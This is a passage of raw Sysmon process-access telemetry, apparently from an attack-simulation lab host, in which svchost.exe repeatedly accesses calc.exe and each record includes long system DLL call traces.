22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360511Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360510Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360509Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360508Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360507Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360506Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360505Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360504Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360503Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360502Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360501Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360500Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360499Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360498Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360497Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360496Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360495Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360494Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360493Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360492Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360491Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360490Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 